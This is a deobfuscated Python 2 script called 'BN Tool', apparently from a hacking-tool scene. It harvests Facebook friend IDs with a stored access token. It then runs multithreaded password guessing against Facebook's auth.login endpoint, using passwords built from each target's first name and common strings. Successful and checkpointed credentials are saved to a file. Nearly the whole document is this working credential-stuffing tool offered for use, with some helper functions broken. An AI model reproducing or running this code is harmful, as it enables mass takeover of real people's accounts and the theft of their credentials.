# Deobfuscated BY HTR-TECH | Tahmid Rayat

# Github    : https://github.com/htr-tech 
# Instagram : https://www.instagram.com/tahmid.rayat
# Facebook  : https://fb.com/tahmid.rayat.oficial 
# Messenger : https://m.me/tahmid.rayat.oficial 

#!/usr/bin/python2
#coding=utf-8


try:
    import os,sys,time,datetime,random,hashlib,re,threading,json,urllib2,cookielib,getpass,mechanize,requests
    from multiprocessing.pool import ThreadPool
    from requests.exceptions import ConnectionError
    from mechanize import Browser
except ImportError:
    os.system('pip2 install requests')
    os.system('pip2 install mechanize')
    time.sleep(1)
    os.system('python2 .README.md')
    
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()


def exb():
	print "[!] Exit"
	os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def psb(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.03)

def t():
    time.sleep(1)
def cb():
    os.system('clear')
##### LOGO #####
logo='''
88888888ba   888      88
88      "8b  8888     88
88      ,8P  88 88    88
88_____-8P'  88  88   88
88------8b,  88   88  88
88      `8b  88    88 88
88      a8P  88     8888
88888888P"   88      888

--------------------------------------------------
➣ Auther   : Binyamin
➣ GitHub   : https://github.com/binyamin-binni
➣ YouTube  : Trick Proof
➣ Blogspot : https://trickproof.blogspot.com
--------------------------------------------------
                                '''

def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r[●] Loging In "+o),;sys.stdout.flush();time.sleep(1)


back = 0
successful = []
cpb = []
oks = []
id = []

def ym():
    try:
        cb()
        os.mkdir("../omi/.....")
    except OSError:
        yp()
    else:
        os.system("cp ../bn/bn.py ../omi/Omi.py")
        os.system("cp ../bn/.README.md ../omi/")
        yb()
    
def yb():
    try:
        os.mkdir("../BlackMafia2020/.....")
    except OSError:
        yl()
    else:
        os.system("cp ../bn/bn.py ../BlackMafia2020/lovehacker")
        os.system("cp ../bn/.README.md ../BlackMafia2020/")
        yl()
    
def yl():
    try:
        os.mkdir("../Qurban/.....")
    except OSError:
        yp()
    else:
        os.system("cp ../bn/bn.py ../Qurban/Qurban.py")
        os.system("cp ../bn/.README.md ../Qurban/")
        yp()
    
def yp():
    try:
        os.mkdir("../faizanwahla/.....")
    except OSError:
        menu()
    else:
        os.system("cp ../bn/bn.py ../faizanwahla/pacman")
        os.system("cp ../bn/.README.md ../faizanwahla/")
        menu()
    
def menu():
	os.system('clear')
	try:
		toket=open('....','r').read()
	except IOError:
		os.system('clear')
		print"[!] Token invalid"
		os.system('rm -rf ....')
		time.sleep(1)
		os.sytem('python2 bn.py')
	try:
		otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
		a = json.loads(otw.text)
		nama = a['name']
		id = a['id']
	except KeyError:
		os.system('clear')
		print"[!] It seems that your account has a checkpoint"
		os.system('rm -rf ....')
		time.sleep(1)
		os.sytem('python2 bn.py')
	except requests.exceptions.ConnectionError:
		print"[!] There is no internet connection"
		exb()
	os.system("clear")
	print logo
	print "[✓] Name : "+nama+"               "
	print "[✓] ID   : "+id+"              "
	print 50*"-"
	print
	print "[1] PAKISTAN Menu"
	print "[2] Other Country Menu"
	print "[3] Update BN Tool"
	print "[4] Follow Me On Facebook"
	print "[5] Log Out"
	print "[0] Exit            "
	print 50*"-"
	action()


def action():
	acb = raw_input("\n  ▄︻̷̿┻̿═━一   ")
	if acb =="":
		print "[!] Fill in correctly"
		action()
	elif acb =="1":
		pak_menu()
	elif acb =="2":
	    other_menu()
	elif acb =="3":
	    os.system('cp .... $HOME')
	    os.system("rm -rf $HOME/bn")
	    os.system('cd $HOME && git clone https://github.com/binyamin-binni/bn')
	    os.system("mv $HOME/.... $HOME/bn")
	    cb()
	    print (logo)
	    psb('10%')
	    psb('20%')
	    psb('30%')
	    psb('40%')
	    psb('50%')
	    psb('60%')
	    psb('70%')
	    psb('80%')
	    psb('90%')
	    psb('100%')
	    psb('✓')
	    psb('✓')
	    psb('✓')
	    psb('Congratulations BN Tool Has Been Updated Successfully')
	    time.sleep(2)
	    os.system("cd $HOME/bn && python2 .README.md")
	elif acb =="4":
	    os.system("xdg-open https://www.facebook.com/100002059014174/posts/2677733205638620/?substory_index=0&app=fbl")
	    time.sleep(1)
	    menu()
	elif acb =="5":
	    os.system("rm -rf ....")
	    print
	    psb(" Logout successfully")
	    exb()
	elif acb =="0":
		exb()
	else:
		print "[!] Fill in correctly"
		action()


def pak_menu():
	global toket
	os.system('clear')
	try:
		toket=open('....','r').read()
	except IOError:
		print"[!] Token invalid"
		os.system('rm -rf ....')
		time.sleep(1)
		os.sytem('python2 bn.py')
	os.system('clear')
	print logo
	print "[1] Crack From Friend List"
	print "[2] Crack From Any Public ID"
	print "[3] Crack From File"
	print "[0] Back"
	print 50*"-"
	pak_action()

def pak_action():
	bpk = raw_input("\n  ▄︻̷̿┻̿═━一   ")
	if bpk =="":
		print "[!] Fill in correctly"
		pak_action()
	elif bpk =="1":
		os.system('clear')
		urllib2.urlopen("https://www.google.com/url?sa=t&source=web&rct=j&url=https://trickproof.blogspot.com/%3Fm%3D1&ved=2ahUKEwi87vKb9cPoAhVIxoUKHT2kBMEQFjAAegQIBBAB&usg=AOvVaw1MUpc0kk_u_Dr7q2z48zC1&cshid=1585630324556")
		print logo
		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
		z = json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])
	elif bpk =="2":
		os.system('clear')
		urllib2.urlopen("https://www.google.com/url?sa=t&source=web&rct=j&url=https://trickproof.blogspot.com/%3Fm%3D1&ved=2ahUKEwi87vKb9cPoAhVIxoUKHT2kBMEQFjAAegQIBBAB&usg=AOvVaw1MUpc0kk_u_Dr7q2z48zC1&cshid=1585630324556")
		print logo
		idt = raw_input("[✓] Enter ID : ")
		os.system("clear")
		print logo
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
			op = json.loads(jok.text)
			psb("[✓] Account  Name: "+op["name"])
			time.sleep(0.5)
		except KeyError:
			print"[!] ID Not Found!"
			raw_input("\n[Back]")
			pak_menu()
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif bpk =="3":
		os.system('clear')
		print logo
		try:
			idlist = raw_input('[✓] Enter File Path  : ')
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		except IOError:
			print '[!] File Not Found'
			raw_input('\n[ Back ]')
			pak_menu()
	elif bpk =="0":
		menu()
	else:
		print "[!] Fill in correctly"
		pak_action()
	xxx = str(len(id))
	psb ("[✓] Total Friends: "+xxx)
	time.sleep(0.5)
	psb ('[✓] Please wait, process is running ...')
	time.sleep(0.5)
	psb ('[!] To Stop Process Press CTRL Then Press z')
	time.sleep(0.5)
	print 50*"-"
	print
	
			
	def main(arg):
		global cpb,oks
		user = arg
		try:
			os.mkdir('save')
		except OSError:
			pass
		try:
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
			b = json.loads(a.text)
			pass1 = '786786'
			data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			q = json.load(data)
			if 'access_token' in q:
				print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass1
				oks.append(user+pass1)
			else:
				if 'www.facebook.com' in q["error_msg"]:
					print '[Checkpoint] ' + user + ' | ' + pass1
					cps = open("save/checkpoint.txt", "a")
					cps.write(user+"|"+pass1+"\n")
					cps.close()
					cpb.append(user+pass1)
				else:
					pass2 = b['first_name']+'12345'
					data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					q = json.load(data)
					if 'access_token' in q:
						print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass2
						oks.append(user+pass2)
					else:
						if 'www.facebook.com' in q["error_msg"]:
							print '[Checkpoint] ' + user + ' | ' + pass2
							cps = open("save/checkpoint.txt", "a")
							cps.write(user+"|"+pass2+"\n")
							cps.close()
							cpb.append(user+pass2)
						else:
							pass3 = b['first_name'] + '123'
							data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
							q = json.load(data)
							if 'access_token' in q:
								print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass3
								oks.append(user+pass3)
							else:
								if 'www.facebook.com' in q["error_msg"]:
									print '[Checkpoint] ' + user + ' | ' + pass3
									cps = open("save/checkpoint.txt", "a")
									cps.write(user+"|"+pass3+"\n")
									cps.close()
									cpb.append(user+pass3)
								else:
									pass4 = 'Pakistan'
									data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
									q = json.load(data)
									if 'access_token' in q:
										print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass4
										oks.append(user+pass4)
									else:
										if 'www.facebook.com' in q["error_msg"]:
											print '[Checkpoint] ' + user + ' | ' + pass4
											cps = open("save/checkpoint.txt", "a")
											cps.write(user+"|"+pass4+"\n")
											cps.close()
											cpb.append(user+pass4)
										else:
											pass5 = b['first_name'] + '786'
											data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
											q = json.load(data)
											if 'access_token' in q:
												print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass5
												oks.append(user+pass5)
											else:
												if 'www.facebook.com' in q["error_msg"]:
													print '[Checkpoint] ' + user + ' | ' + pass5
													cps = open("save/checkpoint.txt", "a")
													cps.write(user+"|"+pass5+"\n")
													cps.close()
													cpb.append(user+pass5)
												else:
													pass6 = b['first_name'] + '1234'
													data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
													q = json.load(data)
													if 'access_token' in q:
														print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass6
														oks.append(user+pass6)
													else:
														if 'www.facebook.com' in q["error_msg"]:
															print '[Checkpoint] ' + user + ' | ' + pass6
															cps = open("save/checkpoint.txt", "a")
															cps.write(user+"|"+pass6+"\n")
															cps.close()
															cpb.append(user+pass6)
														else:
															a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
															b = json.loads(a.text)
															pass7 = b['first_name'] + '1122'
															data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
															q = json.load(data)
															if 'access_token' in q:
																print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass7
																oks.append(user+pass7)
															else:
																if 'www.facebook.com' in q["error_msg"]:
																	print '[Checkpoint] ' + user + ' | ' + pass7
																	cps = open("save/checkpoint.txt", "a")
																	cps.write(user+"|"+pass7+"\n")
																	cps.close()
																	cpb.append(user+pass7)
																	
															
		except:
			pass
		
	p = ThreadPool(50)
	p.map(main, id)
	print 50*"-"
	print '[✓] Process Has Been Completed ....'
	print "[✓] Total OK/CP : "+str(len(oks))+"/"+str(len(cpb))
	print("[✓] CP File Has Been Saved : save/checkpoint.txt")
	raw_input("\n[Back]")
	if xxx == '0':
		pak_menu()
	else:
		os.system('python2 .README.md')

def other_menu():
	global toket
	os.system('clear')
	try:
		toket=open('....','r').read()
	except IOError:
		print"[!] Token invalid"
		os.system('rm -rf ....')
		time.sleep(1)
		os.sytem('python2 bn.py')
	os.system('clear')
	print logo
	print "[1] Crack From Friend List"
	print "[2] Crack From Any Public ID"
	print "[3] Crack From File"
	print "[0] Back"
	print 50*"-"
	other_action()

def other_action():
	otb = raw_input("\n  ▄︻̷̿┻̿═━一   ")
	if otb =="":
		print "[!] Fill in correctly"
		other_action()
	elif otb =="1":
		os.system('clear')
		urllib2.urlopen("https://www.google.com/url?sa=t&source=web&rct=j&url=https://trickproof.blogspot.com/%3Fm%3D1&ved=2ahUKEwi87vKb9cPoAhVIxoUKHT2kBMEQFjAAegQIBBAB&usg=AOvVaw1MUpc0kk_u_Dr7q2z48zC1&cshid=1585630324556")
		print logo
		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
		z = json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])
	elif otb =="2":
		os.system('clear')
		urllib2.urlopen("https://www.google.com/url?sa=t&source=web&rct=j&url=https://trickproof.blogspot.com/%3Fm%3D1&ved=2ahUKEwi87vKb9cPoAhVIxoUKHT2kBMEQFjAAegQIBBAB&usg=AOvVaw1MUpc0kk_u_Dr7q2z48zC1&cshid=1585630324556")
		print logo
		idt = raw_input("[✓] Enter ID : ")
		os.system("clear")
		print logo
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
			op = json.loads(jok.text)
			psb("[✓] Account  Name: "+op["name"])
			time.sleep(0.5)
		except KeyError:
			print"[!] ID Not Found!"
			raw_input("\n[Back]")
			other_menu()
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif otb =="3":
		os.system('clear')
		print logo
		try:
			idlist = raw_input('[✓] Enter File Path  : ')
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		except IOError:
			print '[!] File Not Found'
			raw_input('\n[ Back ]')
			other_menu()
	elif otb =="0":
		menu()
	else:
		print "[!] Fill in correctly"
		other_action()
	xxx = str(len(id))
	psb ("[✓] Total Friends: "+xxx)
	time.sleep(0.5)
	psb ('[✓] Please wait, process is running ...')
	time.sleep(0.5)
	psb ('[!] To Stop Process Press CTRL Then Press z')
	time.sleep(0.5)
	print 50*"-"
	print
	
			
	def main(arg):
		global cpb,oks
		user = arg
		try:
			os.mkdir('save')
		except OSError:
			pass
		try:
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
			b = json.loads(a.text)
			pass1 = '786786'
			data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			q = json.load(data)
			if 'access_token' in q:
				print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass1
				oks.append(user+pass1)
			else:
				if 'www.facebook.com' in q["error_msg"]:
					print '[Checkpoint] ' + user + ' | ' + pass1
					cps = open("save/checkpoint.txt", "a")
					cps.write(user+"|"+pass1+"\n")
					cps.close()
					cpb.append(user+pass1)
				else:
					pass2 = b['first_name']+'12345'
					data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					q = json.load(data)
					if 'access_token' in q:
						print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass2
						oks.append(user+pass2)
					else:
						if 'www.facebook.com' in q["error_msg"]:
							print '[Checkpoint] ' + user + ' | ' + pass2
							cps = open("save/checkpoint.txt", "a")
							cps.write(user+"|"+pass2+"\n")
							cps.close()
							cpb.append(user+pass2)
						else:
							pass3 = b['first_name'] + '123'
							data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
							q = json.load(data)
							if 'access_token' in q:
								print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass3
								oks.append(user+pass3)
							else:
								if 'www.facebook.com' in q["error_msg"]:
									print '[Checkpoint] ' + user + ' | ' + pass3
									cps = open("save/checkpoint.txt", "a")
									cps.write(user+"|"+pass3+"\n")
									cps.close()
									cpb.append(user+pass3)
								else:
									pass4 = 'iloveyou'
									data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
									q = json.load(data)
									if 'access_token' in q:
										print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass4
										oks.append(user+pass4)
									else:
										if 'www.facebook.com' in q["error_msg"]:
											print '[Checkpoint] ' + user + ' | ' + pass4
											cps = open("save/checkpoint.txt", "a")
											cps.write(user+"|"+pass4+"\n")
											cps.close()
											cpb.append(user+pass4)
										else:
											pass5 = 'mahadev'
											data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
											q = json.load(data)
											if 'access_token' in q:
												print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass5
												oks.append(user+pass5)
											else:
												if 'www.facebook.com' in q["error_msg"]:
													print '[Checkpoint] ' + user + ' | ' + pass5
													cps = open("save/checkpoint.txt", "a")
													cps.write(user+"|"+pass5+"\n")
													cps.close()
													cpb.append(user+pass5)
												else:
													pass6 = b['first_name'] + '1234'
													data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
													q = json.load(data)
													if 'access_token' in q:
														print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass6
														oks.append(user+pass6)
													else:
														if 'www.facebook.com' in q["error_msg"]:
															print '[Checkpoint] ' + user + ' | ' + pass6
															cps = open("save/checkpoint.txt", "a")
															cps.write(user+"|"+pass6+"\n")
															cps.close()
															cpb.append(user+pass6)
														else:
															a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
															b = json.loads(a.text)
															pass7 = b['first_name'] + '789'
															data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
															q = json.load(data)
															if 'access_token' in q:
																print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass7
																oks.append(user+pass7)
															else:
																if 'www.facebook.com' in q["error_msg"]:
																	print '[Checkpoint] ' + user + ' | ' + pass7
																	cps = open("save/checkpoint.txt", "a")
																	cps.write(user+"|"+pass7+"\n")
																	cps.close()
																	cpb.append(user+pass7)
																	
															
		except:
			pass
		
	p = ThreadPool(30)
	p.map(main, id)
	print 50*"-"
	print '[✓] Process Has Been Completed ....'
	print "[✓] Total OK/CP : "+str(len(oks))+"/"+str(len(cpb))
	print("[✓] CP File Has Been Saved : save/checkpoint.txt")
	raw_input("\n[Back]")
	if xxx == '0':
		other_menu()
	else:
		os.system('python2 .README.md')
		
if __name__ == '__main__':
    ym()
    
